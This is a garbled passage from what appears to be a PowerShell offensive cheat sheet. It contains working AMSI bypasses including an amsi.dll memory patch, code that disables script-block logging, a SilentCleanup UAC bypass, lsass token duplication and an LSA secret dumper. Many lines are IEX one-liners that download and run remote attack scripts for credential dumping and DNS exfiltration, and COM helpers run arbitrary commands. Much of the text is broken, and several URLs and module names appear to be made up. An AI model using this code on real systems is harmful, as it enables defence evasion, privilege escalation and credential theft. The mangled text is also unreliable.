`$ GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=`$ val
} Else {
[ScriptBlock].GetField('signatures','N'+'onPublic,Static').SetValue(`$ null,(New-Object Collections.Generic.HashSet[string]))
}
}
"@ @" function Invoke-Bypass-$id -AMSI {
# @mattifestation's AMSI bypass
`$ Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');
`$ Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue(`$ null,`$ true);
}
"@ @" function Invoke-Bypass-$id -AMSI2 {
# rastamouse's AMSI bypass (Add-Type writes *.cs on disk!!)
`$ Ref = (
"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
);
`$ Source = @"
using System;
using System.Runtime.InteropServices;
namespace Bypass$id
{
public class AMSI$id
{
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
[DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
static extern void MoveMemory(IntPtr dest, IntPtr src, int size);
public static int Disable()
{
string hexbuffer = "41 6d 73 69 53 63 61 6e 42 75 66 66 65 72";
string buffer="";
string[] hexbuffersplit = hexbuffer.Split(' ');
foreach (String hex in hexbuffersplit)
{
int value = Convert.ToInt32(hex, 16);
buffer+= Char.ConvertFromUtf32(value);
}
IntPtr Address = GetProcAddress(LoadLibrary("a"+ "msi"+ ".dl" +"l"), buffer);
UIntPtr size = (UIntPtr)5;
uint p = 0;
VirtualProtect(Address, size, 0x40, out p);
byte c1=0xB8,c2=0x80;
Byte[] Patch = {c1, 0x57, 0x00, 0x07, c2, 0xC3 };
IntPtr unmanagedPointer = Marshal.AllocHGlobal(6);
Marshal.Copy(Patch, 0, unmanagedPointer, 6);
MoveMemory(Address, unmanagedPointer, 6);
return 0;
}
}
}
`" @; Add-Type -ReferencedAssemblies `$ Ref -TypeDefinition `$ Source -Language CSharp;
iex "[Bypass$id .AMSI$id ]::Disable() | Out-Null"
}
"@ @" function Invoke-Bypass-$id -UACSilentCleanup {
# (Add-Type writes *.cs on disk!!)
# https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html
Param(
[Parameter(Mandatory=`$ True,HelpMessage="Enter command to execute.")]
`$ Command
)
`$ Source = @"
using System;
using Microsoft.Win32;
using System.Diagnostics;
namespace UACBypass
{
public class SilentCleanup$id
{
public static void exec(string payload)
{
// Payload to be executed
Console.WriteLine("[+] Starting Bypass UAC.");
try
{
// Registry Key Modification
RegistryKey key;
key = Registry.CurrentUser.CreateSubKey(@"Environment");
key.SetValue("windir", "cmd.exe /c " + payload + " & ", RegistryValueKind.String);
key.Close();
Console.WriteLine("[+] Enviroment Variabled %windir% Created.");
}
catch
{
Console.WriteLine("[-] Unable to Create the Enviroment Variabled %windir%.");
Console.WriteLine("[-] Exit.");
}
//Wait 5 sec before execution
Console.WriteLine("[+] Waiting 5 seconds before execution.");
System.Threading.Thread.Sleep(5000);
// Trigger the UAC Bypass
try
{
ProcessStartInfo startInfo = new ProcessStartInfo();
startInfo.CreateNoWindow = true;
startInfo.UseShellExecute = false;
startInfo.FileName = "schtasks.exe";
startInfo.Arguments = @"/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I";
Process.Start(startInfo);
Console.WriteLine("[+] UAC Bypass Application Executed.");
}
catch
{
Console.WriteLine("[-] Unable to Execute the Application schtasks.exe to perform the bypass.");
}
//Clean Registry
DeleteKey();
Console.WriteLine("[-] Exit.");
}
static void DeleteKey()
{
//Wait 5 sec before cleaning
Console.WriteLine("[+] Registry Cleaning will start in 5 seconds.");
System.Threading.Thread.Sleep(5000);
try
{
var rkey = Registry.CurrentUser.OpenSubKey(@"Environment", true);
// Validate if the Key Exist
if (rkey != null)
{
try
{
rkey.DeleteValue("windir");
rkey.Close();
}
catch (Exception err)
{
Console.WriteLine(@"[-] Unable to Delete the Registry key (Environment). Error " + err.Message);
}
}
Console.WriteLine("[+] Registry Cleaned.");
}
catch
{
Console.WriteLine("[-] Unable to Clean the Registry.");
}
}
}
}
`" @; Add-Type -TypeDefinition `$ Source -Language CSharp;
iex "[UACBypass.SilentCleanup$id ]::exec(```$ Command) | Out-Null"
}
"@ function Invoke-AMSI {
$amsmodule = [System.Reflection.Assembly ]::LoadWithPartialName(" System.Management.Automation.Amsi" $amsi = [System.Management.Automation.AmsiClient ]::GetAmsiClient()
$amsiScan = [System.Management.Automation.AmsiUtils ]::amsiScanBuffer($amsi , [System.Text.Encoding ]::Unicode.GetBytes(" test" , " Script" , 0 )
if ($amsiScan -eq 1 ) {
Write-Host " AMSI is enabled" else {
Write-Host " AMSI is disabled" Invoke-AMSI function Invoke-AmsiBypass {
$amsi = [Reflection.Assembly ]::LoadWithPartialName(' System.Management.Automation.Amsi' $amsiScan = $amsi.GetType (' System.Management.Automation.AmsiUtils' ' amsiScanBuffer' , [Reflection.BindingFlags ] ' NonPublic, Static' $amsiScan.Invoke ($null , @ ([System.Text.Encoding ]::Unicode.GetBytes(' test' , ' AMSI::amsiScanBuffer()' Invoke-AmsiBypass Invoke-AmsiBypass (Nishang) IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Bypass/Invoke-AmsiBypass.ps1');Invoke-AmsiBypass -Verbose;
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/danielbohannon/Invoke-Obfuscation/master/Invoke-Obfuscation.ps1' Invoke-Obfuscation - Command " Get-Process" - Verbose Invoke-MimikatzWDigestDowngrade # LOCALNew-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/PowerShell/PowerShell/refs/heads/master/docs/firstSteps/Invoke-MimikatzWDigestDowngrade.ps1' Invoke-MimikatzWDigestDowngrade ; Get-Job | Receive-Job
# RDPNew-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/PowerShell/PowerShell/refs/heads/master/docs/firstSteps/Invoke-MimikatzWDigestDowngrade.ps1' Invoke-MimikatzWDigestDowngrade - RDP
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Invoke-MimikatzWDigestDowngrade.ps1' Invoke-MimikatzWDigestDowngrade - RDPIEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/master/Privesc/Invoke-PS3Shell.ps1' Invoke-PS3Shell IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-CredentialDump.ps1' Invoke-CredentialDump IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Escalation/Invoke-PsUACme.ps1' Invoke-PsUACme - Verbose; Invoke-PsUACme - Method AutoElevate SYNOPSIS:
Nishang payload which duplicates the Access token of lsass and sets it in the current process thread.
DESCRIPTION:
This payload duplicates the Access token of lsass and sets it in the current process thread.
The payload must be run with elevated permissions.
AUTHOR:
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/05/use-powershell-to-duplicate-process-tokens-via-p-invoke.aspx
https://github.com/samratashok/nishang
EXAMPLE:
PS > Enable-DuplicateToken CODE:
[CmdletBinding ()]
param ()
$signature = @" [StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct TokPriv1Luid
{
public int Count;
public long Luid;
public int Attr;
}
public const int SE_PRIVILEGE_ENABLED = 0x00000002;
public const int TOKEN_QUERY = 0x00000008;
public const int TOKEN_ADJUST_PRIVILEGES = 0x00000020;
public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000;
public const UInt32 STANDARD_RIGHTS_READ = 0x00020000;
public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001;
public const UInt32 TOKEN_DUPLICATE = 0x0002;
public const UInt32 TOKEN_IMPERSONATE = 0x0004;
public const UInt32 TOKEN_QUERY_SOURCE = 0x0010;
public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040;
public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080;
public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100;
public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY);
public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID);
public const string SE_TIME_ZONE_NAMETEXT = "SeTimeZonePrivilege";
public const int ANYSIZE_ARRAY = 1;
[StructLayout(LayoutKind.Sequential)]
public struct LUID
{
public UInt32 LowPart;
public UInt32 HighPart;
}
[StructLayout(LayoutKind.Sequential)]
public struct LUID_AND_ATTRIBUTES {
public LUID Luid;
public UInt32 Attributes;
}
public struct TOKEN_PRIVILEGES {
public UInt32 PrivilegeCount;
[MarshalAs(UnmanagedType.ByValArray, SizeConst=ANYSIZE_ARRAY)]
public LUID_AND_ATTRIBUTES [] Privileges;
}
[DllImport("advapi32.dll", SetLastError=true)]
public extern static bool DuplicateToken(IntPtr ExistingTokenHandle, int
SECURITY_IMPERSONATION_LEVEL, out IntPtr DuplicateTokenHandle);
[DllImport("advapi32.dll", SetLastError=true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool SetThreadToken(
IntPtr PHThread,
IntPtr Token
);
[DllImport("advapi32.dll", SetLastError=true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool OpenProcessToken(IntPtr ProcessHandle,
UInt32 DesiredAccess, out IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool LookupPrivilegeValue(string host, string name, ref long pluid);
[DllImport("kernel32.dll", ExactSpelling = true)]
public static extern IntPtr GetCurrentProcess();
[DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
public static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall,
ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen);
"@ $currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity ]::GetCurrent())
if ($currentPrincipal.IsInRole ([Security.Principal.WindowsBuiltInRole ]::Administrator) -ne $true ) {
Write-Warning " Run the Command as an Administrator" Break
}
Add-Type - MemberDefinition $signature - Name AdjPriv - Namespace AdjPriv
$adjPriv = [AdjPriv.AdjPriv ]
[long ]$luid = 0
$tokPriv1Luid = New-Object AdjPriv.AdjPriv+ TokPriv1Luid
$tokPriv1Luid.Count = 1
$tokPriv1Luid.Luid = $luid
$tokPriv1Luid.Attr = [AdjPriv.AdjPriv ]::SE_PRIVILEGE_ENABLED
$retVal = $adjPriv ::LookupPrivilegeValue($null , " SeDebugPrivilege" , [ref ]$tokPriv1Luid.Luid )
[IntPtr ]$htoken = [IntPtr ]::Zero
$retVal = $adjPriv ::OpenProcessToken($adjPriv ::GetCurrentProcess(), [AdjPriv.AdjPriv ]::TOKEN_ALL_ACCESS, [ref ]$htoken )
$tokenPrivileges = New-Object AdjPriv.AdjPriv+ TOKEN_PRIVILEGES
$retVal = $adjPriv ::AdjustTokenPrivileges($htoken , $false , [ref ]$tokPriv1Luid , 12 , [IntPtr ]::Zero, [IntPtr ]::Zero)
if (-not ($retVal )) {
[System.Runtime.InteropServices.marshal ]::GetLastWin32Error()
Break
}
$process = (Get-Process - Name lsass)
# $process.nameIntPtr ]$hlsasstoken = [IntPtr ]::Zero
$retVal = $adjPriv ::OpenProcessToken($process.Handle , ([AdjPriv.AdjPriv ]::TOKEN_IMPERSONATE -BOR [AdjPriv.AdjPriv ]::TOKEN_DUPLICATE), [ref ]$hlsasstoken )
[IntPtr ]$dulicateTokenHandle = [IntPtr ]::Zero
$retVal = $adjPriv ::DuplicateToken($hlsasstoken , 2 , [ref ]$dulicateTokenHandle )
$retval = $adjPriv ::SetThreadToken([IntPtr ]::Zero, $dulicateTokenHandle )
if (-not ($retVal )) {
[System.Runtime.InteropServices.marshal ]::GetLastWin32Error()
} Enable-DuplicateToken from Github IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Escalation/Enable-DuplicateToken.ps1' Enable-DuplicateToken IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Escalation/Disable-DuplicateToken.ps1' Disable-DuplicateToken IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Escalation/Invoke-TokenManipulation.ps1' Invoke-TokenManipulation - Username " Administrator" - ImpersonateUser IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Escalation/Invoke-TokenDuplication.ps1' Invoke-TokenDuplication - ProcessID 1234 SYNOPSIS:
Nishang script which extracts LSA Secrets from local computer.
DESCRIPTION:
Extracts LSA secrets from HKLM:\SECURITY\Policy\Secrets\ on a local computer.
The payload must be run with elevated permissions, in 32-bit mode and requires
permissions to the security key in HKLM. The permission could be obtained by using
Enable-DuplicateToken payload.
AUTHOR:
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/06/use-powershell-to-decrypt-lsa-secrets-from-the-registry.aspx
https://github.com/samratashok/nishang
EXAMPLE:
PS > Enable-DuplicateToken
PS > Get-LsaSecret
PS > Enable-DuplicateToken
PS > Get-LsaSecret - RegistryKey KeyName CODE:
function Get-LsaSecret {
[CmdletBinding ()] Param (
[Parameter (Position = 0 , Mandatory = $False )]
[String ]
$RegistryKey
)
Begin {
# Check if User is Elevated$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity ]::GetCurrent())
if ($currentPrincipal.IsInRole ([Security.Principal.WindowsBuiltInRole ]::Administrator) -ne $true ) {
Write-Warning " Run the Command as an Administrator" Break
}
# Check if Script is run in a 32-bit Environment by checking a Pointer Sizeif ([System.IntPtr ]::Size -eq 8 ) {
Write-Warning " Run PowerShell in 32-bit mode" Break
}
# Check if RegKey is specifiedif ([string ]::IsNullOrEmpty($registryKey )) {
[string []]$registryKey = (Split-Path (Get-ChildItem HKLM:\SECURITY\Policy\Secrets | Select - ExpandProperty Name) - Leaf)
}
# Create Temporary Registry Keyif ( -not (Test-Path " HKLM:\\SECURITY\Policy\Secrets\MySecret" " HKLM:\\SECURITY\Policy\Secrets\MySecret" | Out-Null
}
$signature = @" [StructLayout(LayoutKind.Sequential)]
public struct LSA_UNICODE_STRING
{
public UInt16 Length;
public UInt16 MaximumLength;
public IntPtr Buffer;
}
[StructLayout(LayoutKind.Sequential)]
public struct LSA_OBJECT_ATTRIBUTES
{
public int Length;
public IntPtr RootDirectory;
public LSA_UNICODE_STRING ObjectName;
public uint Attributes;
public IntPtr SecurityDescriptor;
public IntPtr SecurityQualityOfService;
}
public enum LSA_AccessPolicy : long
{
POLICY_VIEW_LOCAL_INFORMATION = 0x00000001L,
POLICY_VIEW_AUDIT_INFORMATION = 0x00000002L,
POLICY_GET_PRIVATE_INFORMATION = 0x00000004L,
POLICY_TRUST_ADMIN = 0x00000008L,
POLICY_CREATE_ACCOUNT = 0x00000010L,
POLICY_CREATE_SECRET = 0x00000020L,
POLICY_CREATE_PRIVILEGE = 0x00000040L,
POLICY_SET_DEFAULT_QUOTA_LIMITS = 0x00000080L,
POLICY_SET_AUDIT_REQUIREMENTS = 0x00000100L,
POLICY_AUDIT_LOG_ADMIN = 0x00000200L,
POLICY_SERVER_ADMIN = 0x00000400L,
POLICY_LOOKUP_NAMES = 0x00000800L,
POLICY_NOTIFICATION = 0x00001000L
}
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaRetrievePrivateData(
IntPtr PolicyHandle,
ref LSA_UNICODE_STRING KeyName,
out IntPtr PrivateData
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaStorePrivateData(
IntPtr policyHandle,
ref LSA_UNICODE_STRING KeyName,
ref LSA_UNICODE_STRING PrivateData
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaOpenPolicy(
ref LSA_UNICODE_STRING SystemName,
ref LSA_OBJECT_ATTRIBUTES ObjectAttributes,
uint DesiredAccess,
out IntPtr PolicyHandle
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaNtStatusToWinError(
uint status
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaClose(
IntPtr policyHandle
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaFreeMemory(
IntPtr buffer
);
"@ Add-Type - MemberDefinition $signature - Name LSAUtil - Namespace LSAUtil
}
Process {
foreach ($key in $RegistryKey ) {
$regPath = " HKLM:\\SECURITY\Policy\Secrets\" + $key
$tempRegPath = " HKLM:\\SECURITY\Policy\Secrets\MySecret" $myKey = " MySecret" if (Test-Path $regPath ) {
Try {
Get-ChildItem $regPath - ErrorAction Stop | Out-Null
}
Catch {
Write-Error - Message " Access to registry Denied, run as NT AUTHORITY\SYSTEM" - Category PermissionDenied
Break
}
if (Test-Path $regPath ) {
# Copy Key" CurrVal" , " OldVal" , " OupdTime" , " CupdTime" , " SecDesc" | ForEach-Object {
$copyFrom = " HKLM:\SECURITY\Policy\Secrets\" + $key + " \" + $_
$copyTo = " HKLM:\SECURITY\Policy\Secrets\MySecret\" + $_
if ( -not (Test-Path $copyTo ) ) {
mkdir $copyTo | Out-Null
}
$item = Get-ItemProperty $copyFrom
Set-ItemProperty - Path $copyTo - Name ' (default)' - Value $item .' (default)' $Script :pastevalue
# Attributes$objectAttributes = New-Object LSAUtil.LSAUtil+ LSA_OBJECT_ATTRIBUTES
$objectAttributes.Length = 0
$objectAttributes.RootDirectory = [IntPtr ]::Zero
$objectAttributes.Attributes = 0
$objectAttributes.SecurityDescriptor = [IntPtr ]::Zero
$objectAttributes.SecurityQualityOfService = [IntPtr ]::Zero
# localSystem$localsystem = New-Object LSAUtil.LSAUtil+ LSA_UNICODE_STRING
$localsystem.Buffer = [IntPtr ]::Zero
$localsystem.Length = 0
$localsystem.MaximumLength = 0
# Secret Name$secretName = New-Object LSAUtil.LSAUtil+ LSA_UNICODE_STRING
$secretName.Buffer = [System.Runtime.InteropServices.Marshal ]::StringToHGlobalUni($myKey )
$secretName.Length = [Uint16 ]($myKey.Length * [System.Text.UnicodeEncoding ]::CharSize)
$secretName.MaximumLength = [Uint16 ](($myKey.Length + 1 ) * [System.Text.UnicodeEncoding ]::CharSize)
# Get LSA PolicyHandle$lsaPolicyHandle = [IntPtr ]::Zero
[LSAUtil.LSAUtil + LSA _AccessPolicy ]$access = [LSAUtil.LSAUtil + LSA _AccessPolicy ]::POLICY_GET_PRIVATE_INFORMATION
$lsaOpenPolicyHandle = [LSAUtil.LSAUtil ]::LSAOpenPolicy([ref ]$localSystem , [ref ]$objectAttributes , $access , [ref ]$lsaPolicyHandle )
if ($lsaOpenPolicyHandle -ne 0 ) {
Write-Warning " lsaOpenPolicyHandle Windows Error Code: $lsaOpenPolicyHandle " Continue
}
# Retrieve Private Data$privateData = [IntPtr ]::Zero
$ntsResult = [LSAUtil.LSAUtil ]::LsaRetrievePrivateData($lsaPolicyHandle , [ref ]$secretName , [ref ]$privateData )
$lsaClose = [LSAUtil.LSAUtil ]::LsaClose($lsaPolicyHandle )
$lsaNtStatusToWinError = [LSAUtil.LSAUtil ]::LsaNtStatusToWinError($ntsResult )
if ($lsaNtStatusToWinError -ne 0 ) {
Write-Warning " lsaNtsStatusToWinError: $lsaNtStatusToWinError " LSAUtil.LSAUtil + LSA _UNICODE _STRING ]$lusSecretData =
[LSAUtil.LSAUtil + LSA _UNICODE _STRING ][System.Runtime.InteropServices.marshal ]::PtrToStructure($privateData , [System.Type ][LSAUtil.LSAUtil + LSA _UNICODE _STRING ])
Try {
[string ]$value = [System.Runtime.InteropServices.marshal ]::PtrToStringAuto($lusSecretData.Buffer )
$value = $value.SubString (0 , ($lusSecretData.Length / 2 ))
}
Catch {
$value = " " if ($key -match " ^_SC_" # Get Service Account$serviceName = $key -Replace " ^_SC_" Try {
# Get Service Account$service = Get-WmiObject - Query " SELECT StartName FROM Win32_Service WHERE Name = '$serviceName '" - ErrorAction Stop
$account = $service.StartName
}
Catch {
$account = " " else {
$account = " " # Return Object$obj = New-Object PSObject - Property @ {
Name = $key ;
Secret = $value ;
Account = $Account
}
$obj | Select-Object Name, Account, Secret, @ {Name = " ComputerName" Expression = {$env: COMPUTERNAME }}
}
else {
Write-Error - Message " Path not found: $regPath " - Category ObjectNotFound
}
}
}
end {
if (Test-Path $tempRegPath ) {
Remove-Item - Path " HKLM:\\SECURITY\Policy\Secrets\MySecret" - Recurse - Force
}
}
}IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LSAKey.ps1' Get-LSAKey - Key " MySecret" Get-LsaSecret from Github IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LsaSecret.ps1' Get-LsaSecret - SecretName " SecretName" https:// raw.githubusercontent.com / samratashok/ nishang/ refs/ heads/ master/ Gather/ Get-LSASeal.ps1 IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LSASeal.ps1' Get-LSASeal - SecretName " SecretName" Get-LSASeal from Github (with password) IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LSASeal.ps1' Get-LSASeal - SecretName " SecretName" - Password " password" Get-LSASeal from Github (with password and username) IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LSASeal.ps1' Get-LSASeal - SecretName " SecretName" - Password " password" - Username " username" Get-LSASeal from Github (with password and username and domain) IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LSASeal.ps1' Get-LSASeal - SecretName " SecretName" - Password " password" - Username " username" - Domain " domain" Get-LSASeal from Github (with password and username and domain and computername) IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LSASeal.ps1' Get-LSASeal - SecretName " SecretName" - Password " password" - Username " username" - Domain " domain" - ComputerName " computername" Get-LSASeal from Github (with password and username and domain and computername and lsafile) IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LSASeal.ps1' Get-LSASeal - SecretName " SecretName" - Password " password" - Username " username" - Domain " domain" - ComputerName " computername" - LsaFile " lsafile" Get-LSASeal from Github (with password and username and domain and computername and lsafile and log) IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LSASeal.ps1' Get-LSASeal - SecretName " SecretName" - Password " password" - Username " username" - Domain " domain" - ComputerName " computername" - LsaFile " lsafile" - Log " log" https:// raw.githubusercontent.com / samratashok/ nishang/ refs/ heads/ master/ Utility/ Out-DnsTxt.ps1 https:// raw.githubusercontent.com / BC- SECURITY/ Empire/ master/ data / module_source/ exfiltration/ Invoke-DNSExfiltration.ps1 https:// raw.githubusercontent.com / BC- SECURITY/ Empire/ master/ data / module_source/ exfiltration/ Invoke-PSOutlook.ps1 # Recommend Get-WmiObject// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-WmiObject.ps1 );Get-WmiObject # Recommend Get-WmiObjectProperty// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-WmiObjectProperty.ps1 );Get-WmiObjectProperty
# Not recommend Get-WmiObjectProperty// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-WmiObjectProperty.ps1 );Get-WmiObjectProperty # Recommend Get-WmiObjectMethod// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-WmiObjectMethod.ps1 );Get-WmiObjectMethod # Recommend Invoke-WmiMethod// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Invoke-WmiMethod.ps1 );Invoke-WmiMethod # Recommend Invoke-WmiMethodProperty// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Invoke-WmiMethodProperty.ps1 );Invoke-WmiMethodProperty # Recommend Invoke-WmiMethodProperty// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Invoke-WmiMethodProperty.ps1 );Invoke-WmiMethodProperty # Recommend Get-ComObject// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-ComObject.ps1 );Get-ComObject
# ### Get-ComObjectProperty`` ` powershell
# Recommend Get-ComObjectProperty// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-ComObjectProperty.ps1 );Get-ComObjectProperty
# Not recommend Get-ComObjectProperty// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-ComObjectProperty.ps1 );Get-ComObjectProperty # Recommend Get-ComObjectMethod// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-ComObjectMethod.ps1 );Get-ComObjectMethod # Recommend Get-ComObjectMethodArgs// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-ComObjectMethodArgs.ps1 );Get-ComObjectMethodArgs iex (iwr https:// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ COM- Utility.ps1);COM- Utility Invoke-COM-ShellApplication function Invoke-COM-ShellApplication {
param (
[Parameter (Mandatory = $True )]
[string ]$Command ,
[Parameter (Mandatory = $True )]
[string ]$Argument
)
BEGIN {
$GUID = " 13709620-C279-11CE-A49E-444553540000" Write-Output " [+] Executing ShellApplication COM object" PROCESS {
$Instance = [activator ]::CreateInstance([type ]::GetTypeFromCLSID($GUID ))
$Instance.ShellExecute ($Command , $Argument , " " , " " , 0 )
}
END {
Write-Output " [+] Process Completed" function Invoke-COM-ProcessChain {
param (
[Parameter (Mandatory = $True )]
[string ]$Command ,
[Parameter (Mandatory = $True )]
[string ]$Argument
)
BEGIN {
$GUID = " E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E" Write-Output " [+] Executing ProcessChain COM object" PROCESS {
$Instance = [activator ]::CreateInstance([type ]::GetTypeFromCLSID($GUID ))
$Instance.ExecutablePath = $Command
$Instance.CommandLine = $Argument
$Instance.Start ([ref ]$True )
}
END {
Write-Output " [+] Process Completed" function Invoke-COM-WindowsScriptHost {
param (
[Parameter (Mandatory = $True )]
[string ]$Command ,
[Parameter (Mandatory = $True )]
[string ]$Argument
)
BEGIN {
$GUID = " F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" Write-Output " [+] Executing WindowsScriptHost COM object" PROCESS {
$Instance = [activator ]::CreateInstance([type ]::GetTypeFromCLSID($GUID ))
$Instance.Run ($Command + " " + $Argument )
}
END {
Write-Output " [+] Process Completed" function Invoke-COM-ShellBrowserWindow {
param (
[Parameter (Mandatory = $True )]
[string ]$Command
)
BEGIN {
$GUID = " C08AFD90-F2A1-11D1-8455-00A0C91F3880" Write-Output " [+] Executing ShellBrowserWindow COM object" PROCESS {
$Instance = [activator ]::CreateInstance([type ]::GetTypeFromCLSID($GUID ))
$Instance.Navigate ($Command )
}
END {
Write-Output " [+] Process Completed" function Invoke-COM-XMLHTTP {
param (
[Parameter (Mandatory = $True )]
[string ]$Path ,
[Parameter (Mandatory = $False )]
[switch ]$Execute = $False
)
BEGIN {
$GUID = " F5078F35-C551-11D3-89B9-0000F81FE221" Write-Output " [+] Executing XML HTTP COM object" PROCESS {
$Instance = [activator ]::CreateInstance([type ]::GetTypeFromCLSID($GUID ))
$Instance.Open (" GET" , $Path , $False )
$Instance.Send ()
$Data = $Instance.responseText
if ($Execute ) {
IEX $Data
}
return $Data
}
END {
Write-Output " [+] Process Completed" function Invoke-COM-ScheduleService {
param (
[Parameter (Mandatory = $True )]
[string ]$Command ,
[Parameter (Mandatory = $True )]
[string ]$Argument ,
[Parameter (Mandatory = $False )]
[int ]$Delay = 30
)
BEGIN {
$ProgID = " Schedule.Service" $TaskName = [Guid ]::NewGuid().ToString()
Write-Output " [+] Executing ScheduleService COM object" Write-Output " [+] Task name $ ( $TaskName ) " PROCESS {
$TaskName = [Guid ]::NewGuid().ToString()
$Instance = [activator ]::CreateInstance([type ]::GetTypeFromProgID($ProgID ))
$Instance.Connect ()
$Folder = $Instance.GetFolder (" \" $Task = $Instance.NewTask (0 )
$Trigger = $Task.triggers.Create (0 )
$Trigger.StartBoundary = Convert-Date - Date ((Get-Date ).addSeconds($Delay ))
$Trigger.EndBoundary = Convert-Date - Date ((Get-Date ).addSeconds($Delay + (60 * 60 )))
$Trigger.ExecutionTimelimit = " PT5M" $Trigger.Enabled = $True
$Trigger.Id = $Taskname
$Action = $Task.Actions.Create (0 )
$Action.Path = $Command
$Action.Arguments = $Argument
$Action.HideAppWindow = $True
